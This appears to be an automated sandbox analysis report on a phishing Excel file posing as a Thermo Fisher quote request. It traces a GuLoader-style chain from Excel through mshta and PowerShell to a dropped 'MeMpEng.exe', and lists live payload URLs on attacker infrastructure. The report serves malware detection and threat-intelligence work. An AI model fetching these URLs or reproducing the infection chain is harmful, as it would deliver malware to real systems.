    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1500266 Sample: Thermo Fisher RFQ_TFS-1805.xls Startdate: 28/08/2024 Architecture: WINDOWS Score: 100 88 Suricata IDS alerts for network traffic 2->88 90 Multi AV Scanner detection for submitted file 2->90 92 Yara detected GuLoader 2->92 94 7 other signatures 2->94 10 EXCEL.EXE 33 31 2->10         started        process3 dnsIp4 72 192.3.243.166, 49162, 49164, 49165 AS-COLOCROSSINGUS United States 10->72 74 zhort.de 88.99.66.38, 443, 49161, 49163 HETZNER-ASDE Germany 10->74 70 C:\Users\user\...\ideanetowroking[1].hta, HTML 10->70 dropped 104 Microsoft Office drops suspicious files 10->104 15 mshta.exe 10 10->15         started        19 mshta.exe 10 10->19         started        file5 signatures6 process7 dnsIp8 76 zhort.de 15->76 80 Suspicious command line found 15->80 82 PowerShell case anomaly found 15->82 21 cmd.exe 15->21         started        78 zhort.de 19->78 24 cmd.exe 19->24         started        signatures9 process10 signatures11 96 Suspicious powershell command line found 21->96 98 PowerShell case anomaly found 21->98 26 powershell.exe 24 21->26         started        30 powershell.exe 24->30         started        process12 file13 64 C:\Users\user\AppData\Roaming\MeMpEng.exe, PE32 26->64 dropped 66 C:\Users\user\AppData\...\MeMpEng[1].exe, PE32 26->66 dropped 68 C:\Users\user\AppData\...\nxtolslo.cmdline, Unicode 26->68 dropped 100 Installs new ROOT certificates 26->100 102 Powershell drops PE file 26->102 32 MeMpEng.exe 1 39 26->32         started        36 csc.exe 2 26->36         started        38 MeMpEng.exe 26 30->38         started        40 csc.exe 2 30->40         started        signatures14 process15 file16 46 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 32->46 dropped 48 C:\Users\user\AppData\Local\...\nsDialogs.dll, PE32 32->48 dropped 50 C:\Users\user\AppData\Local\...\UserInfo.dll, PE32 32->50 dropped 60 2 other malicious files 32->60 dropped 84 Machine Learning detection for dropped file 32->84 86 Tries to detect virtualization through RDTSC time measurements 32->86 52 C:\Users\user\AppData\Local\...\nxtolslo.dll, PE32 36->52 dropped 42 cvtres.exe 36->42         started        54 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 38->54 dropped 56 C:\Users\user\AppData\Local\...\nsDialogs.dll, PE32 38->56 dropped 62 3 other malicious files 38->62 dropped 58 C:\Users\user\AppData\Local\...\4xnxdpzb.dll, PE32 40->58 dropped 44 cvtres.exe 40->44         started        signatures17 process18

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Thermo Fisher RFQ_TFS-1805.xls20%VirustotalBrowse
    Thermo Fisher RFQ_TFS-1805.xls11%ReversingLabs
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Roaming\MeMpEng.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\MeMpEng[1].exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\nsn59E.tmp\LangDLL.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\nsn59E.tmp\System.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\nsn59E.tmp\UserInfo.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\nsn59E.tmp\nsDialogs.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\nsn59E.tmp\nsExec.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\nsnB972.tmp\LangDLL.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\nsnB972.tmp\System.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\nsnB972.tmp\UserInfo.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\nsnB972.tmp\nsDialogs.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\nsnB972.tmp\nsExec.dll0%ReversingLabs
    No Antivirus matches
    SourceDetectionScannerLabelLink
    zhort.de2%VirustotalBrowse
    SourceDetectionScannerLabelLink
    http://ocsp.entrust.net030%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    http://go.micros0%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://nuget.org/nuget.exe0%URL Reputationsafe
    http://ocsp.entrust.net0D0%URL Reputationsafe
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
    http://nuget.org/NuGet.exe0%URL Reputationsafe
    http://crl.entrust.net/server1.crl00%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
    https://secure.comodo.com/CPS00%URL Reputationsafe
    http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
    http://192.3.243.166/xampp/vcc/ideanetowroking.htaA0%Avira URL Cloudsafe
    http://192.3.243.166/xampp/vcc/ideanetowroking.hta0%Avira URL Cloudsafe
    https://zhort.de/Fi0%Avira URL Cloudsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
    http://192.3.243.166/xampp/vcc/ideanetowroking.hta...0%Avira URL Cloudsafe
    http://192.3.243.166/xampp/vcc/ideanetowroking.hta$0%Avira URL Cloudsafe
    https://zhort.de/6XcI3x0%Avira URL Cloudsafe
    http://192.3.243.166/xampp/vcc/ideanetowroking.hta0%VirustotalBrowse
    http://192.3.243.166/340/MeMpEng.exesNMicro#z0%Avira URL Cloudsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%VirustotalBrowse
    https://zhort.de/.n0%Avira URL Cloudsafe
    https://zhort.de/6XcI3x2%VirustotalBrowse
    https://zhort.de/tr0%Avira URL Cloudsafe
    http://192.3.243.166/340/MeMpEng.exesAM0%Avira URL Cloudsafe
    http://192.3.243.166/xampp/vcc/ideanetowroking.hta70%Avira URL Cloudsafe
    https://zhort.de/6XcI3xi0%Avira URL Cloudsafe
    http://192.3.243.166/340/MeMpEng.exe0%Avira URL Cloudsafe
    http://192.3.243.166/xampp/vcc/ideanetowroking.htaV.0%Avira URL Cloudsafe
    http://192.3.243.166/340/MeMpEng0%Avira URL Cloudsafe
    http://192.3.243.166/0%Avira URL Cloudsafe
    https://zhort.de/6XcI3xQ0%Avira URL Cloudsafe
    http://192.3.243.166//0%Avira URL Cloudsafe
    http://192.3.243.166/30%Avira URL Cloudsafe
    http://192.3.243.166/340/MeMpEng.exeU/0%Avira URL Cloudsafe
    https://zhort.de/6XcI3xta0%Avira URL Cloudsafe
    http://192.3.243.166/xampp/vcc/ideanetowroking.htab0%Avira URL Cloudsafe
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
    http://192.3.243.166/xampp/vcc/ideanetowroking.htahttp://192.3.243.166/xampp/vcc/ideanetowroking.hta0%Avira URL Cloudsafe
    http://192.3.243.166/xampp/vcc/ideanetowroking.htase0%Avira URL Cloudsafe
    Http://192.3.243.166/xampp/vcc/ideanetowroking.htaf0%Avira URL Cloudsafe
    http://192.3.243.166/xampp/vcc/ideanetowroking.htaings0%Avira URL Cloudsafe
    http://192.3.243.166/xampp/vcc/ideanetowroking.htaZ0%Avira URL Cloudsafe
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%VirustotalBrowse
    https://zhort.de/600%Avira URL Cloudsafe
    http://192.3.243.166/xampp/vcc/ideanetowroking.htattC:0%Avira URL Cloudsafe
    http://192.3.243.166/340/MeMpEng.exes0%Avira URL Cloudsafe
    https://zhort.de/6XcI3xtalicyu0%Avira URL Cloudsafe
    http://192.3.243.166/340/MeMpEng.exep0%Avira URL Cloudsafe
    https://zhort.de/0%Avira URL Cloudsafe
    https://zhort.de/0%VirustotalBrowse
    NameIPActiveMaliciousAntivirus DetectionReputation
    zhort.de
    88.99.66.38
    truefalseunknown
    NameMaliciousAntivirus DetectionReputation
    http://192.3.243.166/xampp/vcc/ideanetowroking.htatrue
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://zhort.de/6XcI3xfalse
    • 2%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://192.3.243.166/340/MeMpEng.exetrue
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://192.3.243.166/xampp/vcc/ideanetowroking.htaAmshta.exe, 00000004.00000003.405684824.0000000003384000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://ocsp.entrust.net03mshta.exe, 00000004.00000003.405684824.0000000003379000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003379000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.429105773.000000001C315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461450253.000000000462D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.000000000462C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.0000000004650000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000464F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000464C000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    https://zhort.de/Fimshta.exe, 0000000C.00000002.461450253.000000000462D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.000000000462C000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://contoso.com/Licensepowershell.exe, 00000007.00000002.428470828.00000000122F1000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://192.3.243.166/xampp/vcc/ideanetowroking.hta...mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.429105773.000000001C315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.0000000004650000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000464F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000464C000.00000004.00000020.00020000.00000000.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.429105773.000000001C315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.0000000004650000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000464F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000464C000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://go.microspowershell.exe, 00000007.00000002.426492015.000000000277F000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://192.3.243.166/xampp/vcc/ideanetowroking.hta$mshta.exe, 00000004.00000003.406507991.0000000000111000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405709089.0000000000128000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406249616.0000000000111000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407210728.0000000000111000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406947877.0000000000111000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://192.3.243.166/340/MeMpEng.exesNMicro#zpowershell.exe, 00000010.00000002.483569421.000000001AE6F000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://zhort.de/.nmshta.exe, 00000004.00000003.406480002.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003384000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://zhort.de/trmshta.exe, 00000004.00000003.406507991.0000000000111000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405709089.0000000000111000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406249616.0000000000111000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407210728.0000000000111000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406947877.0000000000111000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://contoso.com/powershell.exe, 00000007.00000002.428470828.00000000122F1000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.428470828.00000000122F1000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://192.3.243.166/340/MeMpEng.exesAMpowershell.exe, 00000010.00000002.483569421.000000001AE6F000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://192.3.243.166/xampp/vcc/ideanetowroking.hta7mshta.exe, 00000004.00000003.406480002.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003384000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://zhort.de/6XcI3ximshta.exe, 0000000C.00000002.461061796.000000000047A000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://ocsp.entrust.net0Dmshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.428803298.000000001A7B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.0000000004650000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000464F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000464C000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.426492015.00000000022C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.470282539.0000000002471000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://192.3.243.166/xampp/vcc/ideanetowroking.htaV.mshta.exe, 0000000C.00000003.460892429.0000000004679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.0000000004679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.0000000004679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004679000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://192.3.243.166/340/MeMpEngpowershell.exe, 00000007.00000002.426492015.0000000002DE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.470282539.0000000002672000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.428470828.00000000122F1000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://192.3.243.166/mshta.exe, 0000000C.00000003.460855447.000000000468E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000468E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000468E000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000003.405684824.0000000003379000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003379000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.429105773.000000001C315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461450253.000000000462D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.000000000462C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.0000000004650000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000464F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000464C000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    https://zhort.de/6XcI3xQmshta.exe, 00000004.00000002.407167723.00000000000CA000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    Http://192.3.243.166/xampp/vcc/ideanetowroking.htaAmshta.exe, 00000004.00000003.406480002.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003384000.00000004.00000020.00020000.00000000.sdmpfalse
      unknown
      https://contoso.com/Iconpowershell.exe, 00000007.00000002.428470828.00000000122F1000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://192.3.243.166//mshta.exe, 00000004.00000002.407362361.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406480002.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.00000000033A6000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://zhort.de/6XcI3xIThermo Fisher RFQ_TFS-1805.xls, ~DF8BC8A5344F5550C8.TMP.0.drfalse
        unknown
        http://192.3.243.166/3mshta.exe, 00000004.00000002.407362361.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406480002.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.00000000033A6000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://nsis.sf.net/NSIS_ErrorErrorMeMpEng.exe, 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, MeMpEng.exe, 0000000B.00000000.426144572.000000000040A000.00000008.00000001.01000000.0000000A.sdmp, MeMpEng.exe, 00000014.00000000.467976548.000000000040A000.00000008.00000001.01000000.0000000A.sdmp, MeMpEng.exe, 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, MeMpEng.exe.7.dr, MeMpEng[1].exe.7.drfalse
        • URL Reputation: safe
        unknown
        http://192.3.243.166/340/MeMpEng.exeU/powershell.exe, 00000007.00000002.426492015.0000000002DE3000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://zhort.de/6XcI3xtamshta.exe, 0000000C.00000003.460855447.000000000468E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000468E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000468E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://192.3.243.166/xampp/vcc/ideanetowroking.htabmshta.exe, 0000000C.00000003.458342798.00000000004AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460919609.00000000004AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461175381.00000000004AE000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.429105773.000000001C315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.0000000004650000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000464F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000464C000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://192.3.243.166/xampp/vcc/ideanetowroking.htahttp://192.3.243.166/xampp/vcc/ideanetowroking.htamshta.exe, 00000004.00000003.406772799.0000000002525000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.456153015.00000000034F5000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://192.3.243.166/xampp/vcc/ideanetowroking.htasemshta.exe, 00000004.00000003.405684824.0000000003384000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        Http://192.3.243.166/xampp/vcc/ideanetowroking.htafmshta.exe, 00000004.00000003.405684824.0000000003384000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://192.3.243.166/xampp/vcc/ideanetowroking.htaingsmshta.exe, 00000004.00000003.406480002.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.000000000468E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000468E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000468E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://192.3.243.166/xampp/vcc/ideanetowroking.htaZmshta.exe, 00000004.00000003.405684824.0000000003384000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://zhort.de/60mshta.exe, 00000004.00000003.406507991.0000000000111000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405709089.0000000000111000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406249616.0000000000111000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407210728.0000000000111000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406947877.0000000000111000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://192.3.243.166/xampp/vcc/ideanetowroking.htattC:mshta.exe, 0000000C.00000003.458342798.00000000004AE000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://192.3.243.166/340/MeMpEng.exespowershell.exe, 00000007.00000002.428803298.000000001A875000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://secure.comodo.com/CPS0mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.429105773.000000001C2A9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.429105773.000000001C315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461450253.000000000462D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.000000000462C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.0000000004650000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000464F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000464C000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://zhort.de/6XcI3xtalicyumshta.exe, 00000004.00000002.407362361.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406480002.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.00000000033A6000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://192.3.243.166/340/MeMpEng.exeppowershell.exe, 00000007.00000002.426492015.0000000002DE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.470282539.0000000002672000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://zhort.de/mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460892429.0000000004679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.0000000004679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.0000000004679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458342798.00000000004AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460919609.00000000004AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461175381.00000000004AE000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
